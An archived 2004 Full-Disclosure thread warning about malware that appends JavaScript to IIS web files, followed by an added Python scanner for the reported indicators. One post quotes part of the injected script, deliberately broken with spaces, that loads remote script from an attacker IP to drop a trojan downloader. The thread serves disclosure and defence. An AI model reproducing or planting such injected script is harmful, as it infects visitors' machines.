Re: [Full-Disclosure] New malware to infect IIS and from there jump to clients

From: insecure (insecure_at_ameritech.net)
Date: 06/25/04

    To: full-disclosure@lists.netsys.com
    Date: Fri, 25 Jun 2004 12:36:41 -0500
    
    

    Berbew/Webber/Padodor Trojan, according to Lurhq.

    http://www.lurhq.com/berbew.html

    joe wrote:

    >For the IIS side....
    >
    >http://www.microsoft.com/security/incident/download_ject.mspx
    >
    >
    >
    >Microsoft teams are investigating a report of a security issue affecting
    >customers using Microsoft Internet Information Services 5.0 (IIS) and
    >Microsoft Internet Explorer, components of Windows.
    >
    >Important Customers who have deployed Windows XP Service Pack 2 RC2 are not
    >at risk.
    >
    >Reports indicate that Web servers running Windows 2000 Server and IIS that
    >have not applied update 835732, which was addressed by Microsoft Security
    >Bulletin MS04-011, are possibly being compromised and being used to attempt
    >to infect users of Internet Explorer with malicious code.
    >
    >-----Original Message-----
    >From: full-disclosure-admin@lists.netsys.com
    >[mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of Peter Kruse
    >Sent: Thursday, June 24, 2004 7:22 PM
    >To: full-disclosure@lists.netsys.com
    >Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
    >clients
    >
    >Hi all,
    >
    >This is a heads up.
    >
    >A new malware has been reported from several sources so it appears to be
    >fairly widespread already.
    >
    >The malware spreads from infected IIS servers to clients that visit the
    >webpage of the infected server. How the IIS servers were compromised in the
    >first place is unfortunately still unknown (any info on that would be
    >appreciated).
    >
    >The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
    >so by running a javascript that apparently gets appended to several files in
    >the webfolder of IIS (e.g. .html, .txt, .gif). The webpage loads http://
    >217.107.218.147/xxx.html that contains the following code:
    >
    ><script language="Javascript">
    >
    > function InjectedDuringRedirection(){
    > showModalDialog('md.htm', window, "dialog
    >Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
    >:1\;").location= " java script:'<SCRIPT SRC =\\' http://
    >217.107.218.147/shellxxx.js\\'> <\ /script>'";
    >
    >[snip - you get the picture, right?]
    >
    >I had to put in some spaces to get past trivial content filtering.
    >
    >From that point it will try to run the malware in a 1x1 dialog box in the
    >following order:
    >
    >shellscript_loadxxx.js
    >shellxxx.js
    >
    >The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
    >trojan-downloader and run it.
    >
    >Consider denying access to http://217.107.218.147 in your firewall. This
    >will at least prevent client PCs from getting infected.
    >
    >Further information can be found in the daily log from SANS:
    >http://isc.sans.org/
    >
    >Regards
    >Peter Kruse
    >http://www.csis.dk
    >
    >_______________________________________________
    >Full-Disclosure - We believe in it.
    >Charter: http://lists.netsys.com/full-disclosure-charter.html
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
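The thread gives defenders two concrete things to look for on a suspected IIS host: script content appended to files in the web folder (.html, .txt, .gif) and references to the host 217.107.218.147 and the file names xxx.php, xxx.html, shellxxx.js and shellscript_loadxxx.js. The scanner below is an added example written for this archive page, not code from the list posters or from Lurhq/Microsoft; it only reads files and reports which ones carry those indicators. The indicator strings come from the posts above; the function names, the extension list and the constructed sample web root are assumptions made for the example.

```python
"""Scan a web root for the appended-script indicators described in the thread.

Indicators are taken from the mailing-list posts: the host 217.107.218.147,
the file names xxx.php / shellxxx.js / shellscript_loadxxx.js, and the function
name InjectedDuringRedirection. The scanner reads files and reports matches;
it contains none of the malicious script itself.
"""
import os
import re
import tempfile

# Indicator strings quoted in the posts (not invented here).
IOC_HOST = "217.107.218.147"
IOC_NAMES = ("InjectedDuringRedirection", "shellxxx.js",
             "shellscript_loadxxx.js", "xxx.php")

# File types the post says the script was appended to (assumed list).
SUSPECT_EXTENSIONS = {".html", ".htm", ".txt", ".gif"}

# Whitespace-tolerant match for the host, since the post itself shows the
# address with spaces inserted to slip past naive content filters.
_HOST_RE = re.compile(r"217\s*\.\s*107\s*\.\s*218\s*\.\s*147")
_SCRIPT_RE = re.compile(r"<\s*script[^>]*>", re.IGNORECASE)


def find_indicators(data: bytes) -> list[str]:
    """Return the indicator labels present in one file's raw bytes."""
    # latin-1 never fails to decode, so binary files such as GIFs are safe to scan.
    text = data.decode("latin-1")
    hits = []
    if _HOST_RE.search(text):
        hits.append("ioc-host")
    for name in IOC_NAMES:
        if name in text:
            hits.append(name)
    # Any <script> tag inside a GIF means data was appended after the image.
    if data.startswith(b"GIF8") and _SCRIPT_RE.search(text):
        hits.append("script-appended-to-gif")
    return hits


def scan_webroot(root: str) -> dict[str, list[str]]:
    """Walk root and map each flagged file (relative path) to its indicators."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in SUSPECT_EXTENSIONS:
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                hits = find_indicators(fh.read())
            if hits:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = hits
    return findings


def build_sample_webroot() -> str:
    """Create a constructed sample web root: two clean files, two tampered ones."""
    root = tempfile.mkdtemp(prefix="webroot-")
    clean = b"<html><body><h1>Hello</h1></body></html>\n"
    # Constructed: a page with a script tag pointing at the host named in the post.
    tampered_html = clean + b'<script src="http://217.107.218.147/xxx.html"></script>\n'
    # Constructed: a minimal GIF header and trailer with a script block appended.
    tampered_gif = (b"GIF89a\x01\x00\x01\x00\x00\x00\x00;"
                    b"<script>InjectedDuringRedirection()</script>")
    os.makedirs(os.path.join(root, "images"))
    samples = (("index.html", tampered_html), ("about.html", clean),
               ("images/logo.gif", tampered_gif), ("notes.txt", b"just text\n"))
    for rel, content in samples:
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    sample_root = build_sample_webroot()
    for rel_path, labels in sorted(scan_webroot(sample_root).items()):
        print(f"{rel_path}: {', '.join(labels)}")
```

Run it against a real web root by calling `scan_webroot("/path/to/wwwroot")` instead of the constructed sample; matches are a reason to take the server offline and apply the MS04-011 update referenced in the thread, not proof of a clean host when absent, since the indicator list covers only what the posts describe.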
